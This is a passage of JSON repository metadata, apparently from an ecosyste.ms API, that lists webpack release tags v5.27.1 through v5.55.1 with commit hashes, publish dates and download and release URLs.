dency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1/manifests"},{"name":"v5.55.0","sha":"5db30851c7ed007d8f94150ee2c6a1b47d10d388","kind":"tag","published_at":"2021-09-28T17:39:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0/manifests"},{"name":"v5.54.0","sha":"45829826701ff6582ea16bc36376d105ff264c26","kind":"tag","published_at":"2021-09-24T19:07:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.54.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0/manifests"},{"name":"v5.53.0","sha":"6796b73a1ab83739f0e722d914676c9dd58d65e2","kind":"tag","published_at":"2021-09-16T13:52:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.53.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0/manifests"},{"name":"v5.52.1","sha":"d95a0418b64bd366f0c51f2635ef0c24158b8bce","kind":"tag","published_at":"2021-09-10T08:55:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1/manifests"},{"name":"v5.52.0","sha":"4edd3800567f279edd7091af14b3385552a8972f","kind":"tag","published_at":"2021-09-03T15:27:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0/manifests"},{"name":"v5.51.2","sha":"684e22ec4d6e6221de8a4a8a6b3b8f37b863a09d","kind":"tag","published_at":"2021-09-02T13:24:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2/manifests"},{"name":"v5.51.1","sha":"d3da48e7e3da3042b7142fe3deced0bcaac3e704","kind":"tag","published_at":"2021-08-19T14:16:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1/manifests"},{"name":"v5.51.0","sha":"bd7cb37f1c0d872cfff9fc27c7db52a25e1ba6a3","kind":"tag","published_at":"2021-08-19T09:04:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0/manifests"},{"name":"v5.50.0","sha":"400a0f94ab45ca20b10f219c8311e87d3d3f108c","kind":"tag","published_at":"2021-08-10T18:31:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.50.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0/manifests"},{"name":"v5.49.0","sha":"d3868384c37f9d674d1db17a0198393bd213c763","kind":"tag","published_at":"2021-08-06T11:07:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.49.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.49.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.49.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0/manifests"},{"name":"v5.48.0","sha":"67f3aef3c11e2a8d9e7dc1e0300350588ebd7aec","kind":"tag","published_at":"2021-08-02T12:36:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.48.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.48.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.48.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0/manifests"},{"name":"v5.47.1","sha":"3f353b6ae29ae6d96e0ab86e7233b4c785f99c60","kind":"tag","published_at":"2021-07-29T14:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1/manifests"},{"name":"v5.47.0","sha":"efeb1287e52870036cc01b22476852205e99c31a","kind":"tag","published_at":"2021-07-27T14:27:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0/manifests"},{"name":"v5.46.0","sha":"a32b0fd041260f3303b9329c9a65cc4afe102390","kind":"tag","published_at":"2021-07-22T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0/manifests"},{"name":"v5.45.1","sha":"7102df3bb52a33529ff5db4fdf34484d2a359a49","kind":"tag","published_at":"2021-07-16T20:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1/manifests"},{"name":"v5.45.0","sha":"db52c58a4fb037ece22be6365f56c11bc78fb426","kind":"tag","published_at":"2021-07-16T15:50:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0/manifests"},{"name":"v5.44.0","sha":"f20158d4492e73d07a36cd1614dfbd1dc1ea143d","kind":"tag","published_at":"2021-07-08T19:37:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0/manifests"},{"name":"v5.43.0","sha":"b53a06437a3e8b2756c550c1be6ccb33fdba03d7","kind":"tag","published_at":"2021-07-06T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0/manifests"},{"name":"v5.42.1","sha":"4156b20644d309c0e8acaa1e22ca3a4fe546c0b6","kind":"tag","published_at":"2021-07-05T14:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1/manifests"},{"name":"v5.42.0","sha":"4fb45402eec7efe1c70e641cab7b24331948ea8d","kind":"tag","published_at":"2021-07-02T07:04:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0/manifests"},{"name":"v5.41.1","sha":"9ed05afbeaf87442d86863a20a6c30b0ab437fb5","kind":"tag","published_at":"2021-06-29T14:30:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1/manifests"},{"name":"v5.41.0","sha":"fd5dc9997671b4c4b32d15f722e06079cd5da2db","kind":"tag","published_at":"2021-06-28T16:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0/manifests"},{"name":"v5.40.0","sha":"5d297327bc1f208de16c29f5c9b31d2b8a06bce4","kind":"tag","published_at":"2021-06-21T16:25:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0/manifests"},{"name":"v5.39.1","sha":"e5ccd070f6c18794173d3f2e60445de5bc2f52a2","kind":"tag","published_at":"2021-06-17T10:21:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1/manifests"},{"name":"v5.39.0","sha":"e9f90450d5d8b4e796e5e0e9674869220ab73bcb","kind":"tag","published_at":"2021-06-14T21:31:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0/manifests"},{"name":"v5.38.1","sha":"487665cb69f7b1f1aac44097124ef8f33cfe247b","kind":"tag","published_at":"2021-05-27T21:12:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1/manifests"},{"name":"v5.38.0","sha":"daa0f1ed1cebc28c8cc9034f95f3b56e9253ec5e","kind":"tag","published_at":"2021-05-27T12:41:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0/manifests"},{"name":"v5.37.1","sha":"2a5ed4a2dcbe06e852f84a8e7f63145af87cb139","kind":"tag","published_at":"2021-05-19T06:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1/manifests"},{"name":"v5.37.0","sha":"a5821c74568d59a330043900328a018c5d3a4af7","kind":"tag","published_at":"2021-05-10T16:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0/manifests"},{"name":"v5.36.2","sha":"0e2e972a2d181c530bb7185278fe5cfc20724c22","kind":"tag","published_at":"2021-04-30T11:48:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2/manifests"},{"name":"v5.36.1","sha":"e9de77aae42bd8f7d799a21dd16c98206cd170f6","kind":"tag","published_at":"2021-04-28T18:57:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1/manifests"},{"name":"v5.36.0","sha":"c0a3394ae059ba30c90b7e84c3805dcfd918577d","kind":"tag","published_at":"2021-04-27T09:44:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0/manifests"},{"name":"v5.35.1","sha":"ed175cd22f89eb9fecd0a70572a3fd0be028e77c","kind":"tag","published_at":"2021-04-23T18:36:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1/manifests"},{"name":"v5.35.0","sha":"e05935f8969d873a20762767d348256e5ad8fb46","kind":"tag","published_at":"2021-04-21T06:37:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0/manifests"},{"name":"v5.34.0","sha":"a52263b4537dc5bd954677fc884966b0c11114d4","kind":"tag","published_at":"2021-04-19T14:42:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0/manifests"},{"name":"v5.33.2","sha":"93ce24d2dc40ee972a2ea5138f3c181563c913fd","kind":"tag","published_at":"2021-04-14T18:31:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2/manifests"},{"name":"v5.33.1","sha":"7a7d3be25a3db94cb47923d122513726966025cf","kind":"tag","published_at":"2021-04-14T18:08:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1/manifests"},{"name":"v5.33.0","sha":"7ee3bab88a5f38d4a6356baf93a8c9dfb901b9dc","kind":"tag","published_at":"2021-04-14T17:28:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0/manifests"},{"name":"v5.32.0","sha":"932950550c85dce4efcaccd7116b4879bfd5f962","kind":"tag","published_at":"2021-04-12T18:54:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0/manifests"},{"name":"v5.31.2","sha":"cde1b73e12eb8a77eb9ba42e7920c9ec5d29c2c9","kind":"tag","published_at":"2021-04-09T17:52:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2/manifests"},{"name":"v5.31.1","sha":"34502650252c1f5e2b6e19f3d5afd1fac96f3ec4","kind":"tag","published_at":"2021-04-09T17:07:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1/manifests"},{"name":"v5.31.0","sha":"b3e26cb5a81087c1b4eadb2e648eb01928c9b3be","kind":"tag","published_at":"2021-04-07T16:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0/manifests"},{"name":"v5.30.0","sha":"f3dce69e9df5f778fb4850662b0f16f9fd9951d2","kind":"tag","published_at":"2021-04-01T18:45:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0/manifests"},{"name":"v5.29.0","sha":"0522deb7618636b37acae64f5e3b581c7bbb8fca","kind":"tag","published_at":"2021-04-01T15:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0/manifests"},{"name":"v5.28.0","sha":"15110ea6de0b53c93d697716d17037c41a3c0cd2","kind":"tag","published_at":"2021-03-24T12:35:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0/manifests"},{"name":"v5.27.2","sha":"1c044bc75be02fcfe78eb6a291f2d107f8ac58eb","kind":"tag","published_at":"2021-03-22T14:40:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2/manifests"},{"name":"v5.27.1","sha":"69d4e174b96f197ef5d9d8396edaa25178f22725","kind":"tag","published_at":"2021-03-20T19:39:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1","manifests_url":"https://repos.